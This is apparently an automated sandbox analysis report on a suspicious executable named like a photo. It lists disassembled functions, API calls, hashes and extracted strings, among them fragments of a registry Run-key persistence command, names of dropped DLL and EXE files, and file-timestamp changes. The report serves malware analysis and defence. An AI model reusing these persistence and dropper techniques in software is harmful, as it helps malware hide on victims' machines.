                                                                • String ID: (x8$%s%s$%s%s$%s.e$.exe$0SafeMonClass$2.l$6)\$A$BkSha$C:\P$CU\SOF$G_SZ /d "$Open$Q36$Shel$Shel$TWARE\Mic$am F$cef.dll$cute$d "HK$dll$dowWndClass$dows\Curr$entVe$ft\Win$g.e$iles$l32.$lExe$lalala123%$le:///$mo /t RE$rogr$roso$rsion\R$t3d.$t4d.$t5d.$text/$tmp$tmp$tmp$un" /v de$xe
                                                                • API String ID: 3410144617-526106949
                                                                • Opcode ID: 62a793b019d441827b141c2a1fc1b299d8a782e43d538f265309815979e85cbb
                                                                • Instruction ID: 1d55cf24179f17eece6f5917ab6af60b84a4e4854abaf7134e855f89ee955b5e
                                                                • Opcode Fuzzy Hash: 62a793b019d441827b141c2a1fc1b299d8a782e43d538f265309815979e85cbb
                                                                • Instruction Fuzzy Hash: 5CA2C07154C3C5AEE321DB649845BABB7E9FFC4740F00482EF588CB291EAB1A984C757
                                                                Function 10008A7E Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 252filetimeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 420 10008a7e-10008ab1 421 10008ab3-10008ab5 call 10008215 420->421 422 10008aba-10008ac6 420->422 421->422 424 10008ad2-10008ad5 422->424 425 10008ac8-10008acd 422->425 427 10008ae4-10008ae9 424->427 428 10008ad7-10008ade call 10007c48 424->428 426 10008db4-10008dc2 call 1000a501 425->426 431 10008aeb-10008af7 call 10007c7d 427->431 432 10008aff-10008b1a call 1000839b 427->432 428->427 439 10008af9 431->439 440 10008b49-10008b54 432->440 441 10008b1c-10008b1e 432->441 439->432 442 10008b64-10008b66 440->442 443 10008b20-10008b22 441->443 444 10008b2e-10008b31 441->444 445 10008b56-10008b58 442->445 446 10008b68-10008b7f call 1000b61b 442->446 443->444 447 10008b24-10008b26 443->447 448 10008b3b-10008b44 call 10008930 444->448 449 10008b5a-10008b5c 445->449 450 10008b5e 445->450 458 10008b85 446->458 459 10008c1d-10008c30 446->459 452 10008b33-10008b3a 447->452 453 10008b28-10008b2c 447->453 448->426 449->450 455 10008b61-10008b62 449->455 450->455 452->448 453->444 453->452 455->442 462 10008b8c-10008c13 call 1000c4a0 * 2 call 1000b0dd call 1000ad20 458->462 460 10008c32-10008c39 459->460 461 10008c55-10008c80 call 1000a510 call 10008930 459->461 460->461 463 10008c3b-10008c42 460->463 473 10008cb0-10008cd6 CreateFileA 461->473 482 10008c82 462->482 483 10008c15-10008c1b 462->483 463->462 466 10008c48-10008c4f 463->466 466->461 466->462 475 10008ce2-10008cf6 call 10007e91 473->475 476 10008cd8-10008cdd 473->476 484 10008cf8-10008d03 call 1000b4c8 475->484 485 10008d09 475->485 476->426 486 10008c83-10008ca1 call 1000a510 call 10008930 482->486 483->486 484->485 488 10008d0f-10008d2f call 10007fea 485->488 497 10008ca6-10008cae 486->497 495 10008dc5-10008dcf 488->495 496 10008d35-10008d37 488->496 498 10008d71-10008d7f call 10008215 495->498 499 10008d67 496->499 500 10008d39 496->500 497->473 507 10008d81-10008d9c SetFileTime 498->507 508 10008da2-10008dae CloseHandle 498->508 499->498 501 10008d5a-10008d61 500->501 502 10008d3b-10008d58 WriteFile 500->502 501->498 505 10008d63-10008d65 501->505 502->501 504 10008dd1-10008ddb 502->504 504->498 505->488 505->499 507->508 508->426
                                                                APIs
                                                                • __fassign.LIBCMT ref: 10008B75
                                                                • _memset.LIBCMT ref: 10008BA9
                                                                • _memset.LIBCMT ref: 10008BCD
                                                                • _strcat_s.LIBCMT ref: 10008BE8
                                                                • _sprintf.LIBCMT ref: 10008C69
                                                                • _sprintf.LIBCMT ref: 10008C91
                                                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 10008CC7
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 10008D50
                                                                • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 10008D9C
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 10008DA8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                                                • String ID: %s%s$:$\$text.e
                                                                • API String ID: 3001508280-2720340845
                                                                • Opcode ID: a2e5e15b75667134caac5859dc2017c2feeef848189aa715af809c3c4918df33
                                                                • Instruction ID: 2659727ae892349c9a1cc8126b4bdf09fa2e1e525e7c16959e2080c4e1c60f4a
                                                                • Opcode Fuzzy Hash: a2e5e15b75667134caac5859dc2017c2feeef848189aa715af809c3c4918df33
                                                                • Instruction Fuzzy Hash: A591B171D00A289BFB61CA14CC85BDABBB8FB09395F1001D6E598A7185D770AFC5CF91
                                                                Function 10002C08 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111filesleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10002C47
                                                                • _memset.LIBCMT ref: 10002C70
                                                                • Sleep.KERNEL32(00000001), ref: 10002C90
                                                                • _malloc.LIBCMT ref: 10002CCA
                                                                • _memset.LIBCMT ref: 10002CF7
                                                                • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 10002D0F
                                                                • _free.LIBCMT ref: 10002D16
                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10002D3E
                                                                • FlushFileBuffers.KERNEL32(?), ref: 10002D4A
                                                                • CloseHandle.KERNEL32(?), ref: 10002D56
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
                                                                • String ID: cef.dll$lib
                                                                • API String ID: 1923221151-1944707463
                                                                • Opcode ID: 7194e6291df658fa59c4f613086d471f9f11df94d9454561c6d499fb72296160
                                                                • Instruction ID: 54aeca7516b8b968042b0eea4134454b72480e23f4a01d4031a2aafac840d857
                                                                • Opcode Fuzzy Hash: 7194e6291df658fa59c4f613086d471f9f11df94d9454561c6d499fb72296160
                                                                • Instruction Fuzzy Hash: 0731827190022CAFEB15DF648C85FEEBBB9FB19354F0041D5F689A6150DAB19EC18F50
                                                                Function 100028B9 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 236fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • _memset.LIBCMT ref: 100028FF
                                                                • _memset.LIBCMT ref: 10002911
                                                                • _memset.LIBCMT ref: 10002920
                                                                • _memset.LIBCMT ref: 10002B15
                                                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 10002BBF
                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002BE6
                                                                • FlushFileBuffers.KERNEL32(00000005), ref: 10002BF2
                                                                • CloseHandle.KERNEL32(00000005), ref: 10002BFE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$File$BuffersCloseCreateFlushHandleWrite
                                                                • String ID: <
                                                                • API String ID: 2144675991-4251816714
                                                                • Opcode ID: fa892f95ba6b4a3744a8da890ffc6a4cdfeaaf52ca20d0832582be61c214c1f8
                                                                • Instruction ID: 89ec0f64cc6022f2ef4fce1017900847434db0f7d38f987f34c33e9451b14973
                                                                • Opcode Fuzzy Hash: fa892f95ba6b4a3744a8da890ffc6a4cdfeaaf52ca20d0832582be61c214c1f8
                                                                • Instruction Fuzzy Hash: F591A775900228AFEB219F64CC859EABBFDFB09395F14C1EAF509A2150DB319F858F50
                                                                Function 10008930 Relevance: 10.6, APIs: 7, Instructions: 114COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 589 10008930-1000894d 590 100089af-100089b3 589->590 591 1000894f-1000896a call 1000b61b 589->591 592 10008a70-10008a7d call 1000a501 590->592 593 100089b9-100089bc 590->593 598 1000896d-10008972 591->598 595 100089be-100089c0 593->595 599 100089c2-100089c4 595->599 600 100089c6 595->600 598->598 602 10008974-10008976 598->602 599->600 603 100089c8-100089cd 599->603 600->603 604 10008978-10008984 602->604 605 1000898e-1000899e GetFileAttributesA 602->605 603->595 606 100089cf-100089d1 603->606 607 10008986-10008989 604->607 608 1000898b 604->608 605->590 609 100089a0-100089a9 CreateDirectoryA 605->609 610 100089d3-100089f8 call 10012e20 call 10008930 606->610 611 100089fb-10008a05 606->611 607->605 607->608 608->605 609->590 610->611 612 10008a07-10008a19 call 1000b61b 611->612 613 10008a1c-10008a26 611->613 612->613 617 10008a29-10008a2e 613->617 617->617 620 10008a30-10008a5f call 1000b61b GetFileAttributesA 617->620 620->592 624 10008a61-10008a6a CreateDirectoryA 620->624 624->592
                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 10008995
                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 100089A9
                                                                • __fassign.LIBCMT ref: 1000895C
                                                                  • Part of subcall function 1000B61B: __mbsnbcpy_l.LIBCMT ref: 1000B62B
                                                                • __fassign.LIBCMT ref: 10008A14
                                                                • __fassign.LIBCMT ref: 10008A43
                                                                • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 10008A56
                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 10008A6A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                                                • String ID:
                                                                • API String ID: 2854908881-0
                                                                • Opcode ID: 3c174522a4f976eda7b1380f608ab6b27e0636f133cc530685a3a7431421f8a0
                                                                • Instruction ID: 91c1e80bd56abd845fcbfb77fb78178165a6c206ea0fcbd970bcf73cc3f8dc49
                                                                • Opcode Fuzzy Hash: 3c174522a4f976eda7b1380f608ab6b27e0636f133cc530685a3a7431421f8a0
                                                                • Instruction Fuzzy Hash: 56410B755042489AFB00DB68CC88BE977EDFB05380F5801E5E5D4D3186DB719F88CB52
                                                                Function 10009824 Relevance: 9.3, APIs: 6, Instructions: 301COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 625 10009824-1000987b call 10013a60 call 10009c60 630 10009880-10009886 625->630 631 1000987d 625->631 632 10009888 630->632 633 1000988b-1000989e call 10008ddd 630->633 631->630 632->633 636 100098a0-100098a6 633->636 637 100098ce-100098db 633->637 640 100098a8 636->640 641 100098ab-100098b1 636->641 638 100098e0-100098e3 637->638 639 100098dd 637->639 644 100098e5 638->644 645 1000990f-1000991f call 10008352 638->645 639->638 640->641 642 100098b3 641->642 643 100098b6-100098c9 wsprintfA 641->643 642->643 646 10009bed-10009bf0 643->646 647 100098ef 644->647 645->647 656 10009921-10009933 call 10008e86 645->656 651 10009bf2 646->651 652 10009bf5-10009c5f OutputDebugStringA call 10009d27 call 100052b8 call 100052f3 call 100052b8 * 5 call 10013aaa 646->652 649 100098f5-100098fd 647->649 654 10009bc1 call 1000972c 649->654 655 10009903-1000990a call 10008ef0 649->655 651->652 664 10009bc6-10009bcd 654->664 655->664 656->647 665 10009935-10009949 656->665 667 10009bd2-10009be9 wsprintfA 664->667 668 10009bcf 664->668 665->649 669 1000994b-1000997a call 1000afa4 call 10008e86 665->669 667->646 668->667 679 10009982-100099a8 call 1000976d 669->679 680 1000997c 669->680 686 10009bb7-10009bbc call 1000a1f1 679->686 687 100099ae-10009a73 call 1000518c call 10009c8a call 10009ce1 call 10009dc6 call 100052b8 call 10009ce1 call 10009dc6 call 100052b8 679->687 680->679 686->654 711 10009a75 687->711 712 10009a78-10009a7e 687->712 711->712 713 10009a80 712->713 714 10009a83-10009a87 712->714 713->714 715 10009aa3-10009aa5 714->715 716 10009a89-10009a8b 714->716 719 10009aa8-10009aaa 715->719 717 10009a8d-10009a93 716->717 718 10009a9f-10009aa1 716->718 717->715 720 10009a95-10009a9d 717->720 718->719 721 10009ab0-10009ab3 719->721 722 10009b46-10009b72 call 100052b8 * 3 719->722 720->714 720->718 721->722 723 10009ab9-10009abf 721->723 736 10009b80-10009bac 722->736 737 10009b74-10009b7f call 1000b09f 722->737 725 10009ac1 723->725 726 10009ac4-10009aed call 1000518c call 10009d5b 723->726 725->726 738 10009af2-10009af8 726->738 739 10009aef 726->739 736->669 743 10009bb2 736->743 737->736 740 10009afa 738->740 741 10009afd-10009b0a call 10008ec1 738->741 739->738 740->741 746 10009b0f-10009b13 741->746 743->649 747 10009b15-10009b1a 746->747 748 10009b38-10009b41 call 100052b8 746->748 747->748 749 10009b1c-10009b21 747->749 748->722 749->748 751 10009b23-10009b28 749->751 751->748 752 10009b2a-10009b2f 751->752 752->748 753 10009b31 752->753 753->748
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 1000982E
                                                                • wsprintfA.USER32 ref: 100098BD
                                                                • wsprintfA.USER32 ref: 10009BE0
                                                                  • Part of subcall function 10008352: __fassign.LIBCMT ref: 10008365
                                                                • _wprintf.LIBCMT ref: 1000995C
                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10009BBC
                                                                • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 10009BF6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                                                • String ID:
                                                                • API String ID: 2279894289-0
                                                                • Opcode ID: af97c16b9bc72f73c7fb8f8c3beacf77b5c1f1420b3646836506e55af6554735
                                                                • Instruction ID: 622278a19ea4e0f23fdf8b31d223e814ca222b5bb078937c9ab139d7dbdd0e1d
                                                                • Opcode Fuzzy Hash: af97c16b9bc72f73c7fb8f8c3beacf77b5c1f1420b3646836506e55af6554735
                                                                • Instruction Fuzzy Hash: 1EC15975D002699BEF22CFA4CC81ADDB7B8EF05390F5041AAE949A7245DB30AF85CF51
                                                                Function 0048A378 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 754 48a378-48a380 755 48a38f-48a392 call 48dde5 754->755 757 48a397-48a39a 755->757 758 48a39c-48a39d 757->758 759 48a382-48a38d call 495404 757->759 759->755 762 48a39e-48a3af 759->762 763 48a3dd-48a3f7 call 48a284 call 49303f 762->763 764 48a3b1-48a3dc call 48a13c call 48ae63 762->764 764->763
                                                                APIs
                                                                • _malloc.LIBCMT ref: 0048A392
                                                                  • Part of subcall function 0048DDE5: __FF_MSGBANNER.LIBCMT ref: 0048DDFE
                                                                  • Part of subcall function 0048DDE5: __NMSG_WRITE.LIBCMT ref: 0048DE05
                                                                  • Part of subcall function 0048DDE5: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,0048A397,?), ref: 0048DE2A
                                                                • std::exception::exception.LIBCMT ref: 0048A3C7
                                                                • std::exception::exception.LIBCMT ref: 0048A3E1
                                                                • __CxxThrowException@8.LIBCMT ref: 0048A3F2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                • String ID: @b
                                                                • API String ID: 615853336-739809174
                                                                • Opcode ID: c3bea326c18d8601e06f13f0b38c71335edf92560edd4d8c4a2ecdae9b1cf087
                                                                • Instruction ID: 07f944421c27335e30f0be26188a174b31f44755ac6b4b41ac08a01ed6b1d9c2
                                                                • Opcode Fuzzy Hash: c3bea326c18d8601e06f13f0b38c71335edf92560edd4d8c4a2ecdae9b1cf087
                                                                • Instruction Fuzzy Hash: 99F02D31500205A7EF11FB55DC025AF7FAA6B01758F180C3FF81096192DBF98A16DB57
                                                                Function 10002D6B Relevance: 6.1, APIs: 4, Instructions: 68fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002D87
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 10002D92
                                                                  • Part of subcall function 1000A25F: _malloc.LIBCMT ref: 1000B4E2
                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002DAD
                                                                • CloseHandle.KERNEL32(?), ref: 10002DCC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleReadSize_malloc
                                                                • String ID:
                                                                • API String ID: 1369180008-0
                                                                • Opcode ID: d86be2d11198bb8b3d3548a2baccd8740581441c81fff3067ac5a97e511b0495
                                                                • Instruction ID: b6e065022b967105a3a6c677f7e07d96cb23a3d5ec31f6699da48e5f37e9fbfa
                                                                • Opcode Fuzzy Hash: d86be2d11198bb8b3d3548a2baccd8740581441c81fff3067ac5a97e511b0495
                                                                • Instruction Fuzzy Hash: 8A11A575500224BAFB11AB71CC89EEF3F6DFF456D0F004125F909A6056DA70AD50C6F0
                                                                Function 1000B4C8 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • _malloc.LIBCMT ref: 1000B4E2
                                                                  • Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
                                                                  • Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
                                                                  • Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0
                                                                • std::exception::exception.LIBCMT ref: 1000B517
                                                                • std::exception::exception.LIBCMT ref: 1000B531
                                                                • __CxxThrowException@8.LIBCMT ref: 1000B542
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                • String ID:
                                                                • API String ID: 615853336-0
                                                                • Opcode ID: fed967542a08c0061ac2f05d02469dd67cfdd1ec288f06afea94a4534caab2f9
                                                                • Instruction ID: a75e7fbd331fdb54b571f695bf5094c90e00ed0fd4663d813d0828e10929f906
                                                                • Opcode Fuzzy Hash: fed967542a08c0061ac2f05d02469dd67cfdd1ec288f06afea94a4534caab2f9
                                                                • Instruction Fuzzy Hash: 01F02835400759ABFB50DF54CC46EAD3BBAFB013D0F60015AF815AA096CF74DE868740
                                                                Function 10007E91 Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 917 10007e91-10007e9f 918 10007ea1 917->918 919 10007ea9-10007eac 917->919 920 10007ea3-10007ea4 918->920 919->918 921 10007eae-10007eb1 919->921 922 10007fe6-10007fe9 920->922 923 10007eb3-10007eb8 call 10008215 921->923 924 10007eba-10007ed1 call 10007cce 921->924 923->924 929 10007ed3-10007ed5 924->929 930 10007ed7-10007ee7 call 1000ac8b 924->930 929->920 933 10007f10-10007f13 930->933 934 10007ee9-10007f07 call 1000ac8b 930->934 936 10007fe5 933->936 938 10007f18-10007f42 934->938 939 10007f09-10007f0f call 1000ac51 934->939 936->922 941 10007f62-10007f7e 938->941 942 10007f44-10007f50 call 10007127 938->942 939->933 945 10007f80-10007f83 941->945 946 10007f85 941->946 948 10007f55-10007f59 942->948 947 10007f88-10007fbb 945->947 946->947 949 10007fd0-10007fe3 947->949 950 10007fbd-10007fc4 947->950 948->941 951 10007f5b 948->951 949->936 950->949 952 10007fc6-10007fce call 10006f1a 950->952 951->941 952->949 952->950
                                                                APIs
                                                                • _malloc.LIBCMT ref: 10007EDD
                                                                  • Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
                                                                  • Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
                                                                  • Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0
                                                                • _malloc.LIBCMT ref: 10007EEE
                                                                • _free.LIBCMT ref: 10007F0A
                                                                  • Part of subcall function 1000AC51: RtlFreeHeap.NTDLL(00000000,00000000,?,1000A824,?,?,1000101C), ref: 1000AC67
                                                                  • Part of subcall function 1000AC51: GetLastError.KERNEL32(?,?,1000A824,?,?,1000101C), ref: 1000AC79
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Heap_malloc$AllocateErrorFreeLast_free
                                                                • String ID:
                                                                • API String ID: 916394080-0
                                                                • Opcode ID: 60b11c1cfe0fbb3405eef0f7a633403ef12bcde8c2e364a545f5c540641d3538
                                                                • Instruction ID: 5c4abcf3b0273c4115ce77ce56a80b6181141dfd5b40fb2f3c57c33d422fee36
                                                                • Opcode Fuzzy Hash: 60b11c1cfe0fbb3405eef0f7a633403ef12bcde8c2e364a545f5c540641d3538
                                                                • Instruction Fuzzy Hash: CB419C75A05656EFEB45CF68C4809A9BBF8FF08790B1001AAE858CB74AD734F950CBD0
                                                                Function 10007777 Relevance: 4.6, APIs: 3, Instructions: 113COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 955 10007777-10007790 call 100075d8 958 10007792-10007795 955->958 959 1000779a-1000779d 955->959 960 100078a4-100078a7 958->960 961 100077c0 959->961 962 1000779f-100077a3 959->962 965 100077c3 961->965 963 100077a5-100077b8 SetFilePointer 962->963 964 100077ba-100077be 962->964 963->965 966 100077c6-100077d3 964->966 965->966 967 100077d5 966->967 968 100077d8-100077ea call 1000ac8b 966->968 967->968 971 100077f4-100077fe 968->971 972 100077ec-100077ef 968->972 974 10007804 971->974 975 10007897-100078a2 call 1000ac51 971->975 973 100078a3 972->973 973->960 977 1000780e-1000781b 974->977 975->973 978 10007820-1000782c 977->978 979 1000781d 977->979 981 10007830-1000783e call 100075d8 978->981 982 1000782e 978->982 979->978 981->975 985 10007840-10007849 call 10007637 981->985 982->981 987 1000784e-10007854 985->987 987->975 988 10007856-10007859 987->988 989 1000787a-1000787c 988->989 990 1000785b-10007863 989->990 991 1000787e 989->991 990->989 993 10007865-1000786a 990->993 992 10007885-10007889 991->992 992->975 994 1000788b-10007891 992->994 993->989 995 1000786c-10007871 993->995 994->975 996 10007806-10007809 994->996 995->989 997 10007873-10007878 995->997 996->977 997->989 998 10007880-10007882 997->998 998->992
                                                                APIs
                                                                  • Part of subcall function 100075D8: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604
                                                                • SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000001,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 100077AF
                                                                • _malloc.LIBCMT ref: 100077DF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: FilePointer$_malloc
                                                                • String ID:
                                                                • API String ID: 3040784002-0
                                                                • Opcode ID: 28e1fefcf659a16470e03273281f6f5609ee5f1abf9c06588519510a91d29f85
                                                                • Instruction ID: 1313e7d9f5820cc7ab2e201ac5c5f020cab07999e36477c17eb6c123f5e17d05
                                                                • Opcode Fuzzy Hash: 28e1fefcf659a16470e03273281f6f5609ee5f1abf9c06588519510a91d29f85
                                                                • Instruction Fuzzy Hash: 0B41A271E44246ABFB10DA68C848B9DBBF1FF043D4F25C169E909E7289EB78D940CB41
                                                                Function 1000752C Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 999 1000752c-10007559 CreateFileA 1000 10007565-1000759f SetFilePointer call 1000b4c8 999->1000 1001 1000755b-10007563 999->1001 1005 100075a1-100075a8 SetFilePointer 1000->1005 1006 100075ab-100075b2 1000->1006 1002 100075b3-100075b6 1001->1002 1005->1006 1006->1002
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000141,00000141,?,10008324,?,?), ref: 1000754D
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B86,?), ref: 10007571
                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000020,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B86,?), ref: 100075A6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: File$Pointer$Create
                                                                • String ID:
                                                                • API String ID: 250661774-0
                                                                • Opcode ID: 937e745b7458db1d1c02225848fbd8e50125f5581100b2d9b8b04083533d578e
                                                                • Instruction ID: b1a7f2e70109716a175c2d37c51be133c3c27d8d5b2c45801dce53fe0fcebab3
                                                                • Opcode Fuzzy Hash: 937e745b7458db1d1c02225848fbd8e50125f5581100b2d9b8b04083533d578e
                                                                • Instruction Fuzzy Hash: 55118671544748BEE7118F78CC81B9ABBECEF057A4F10895DF599A72C1D2B5AD408B20
                                                                Function 00401A22 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
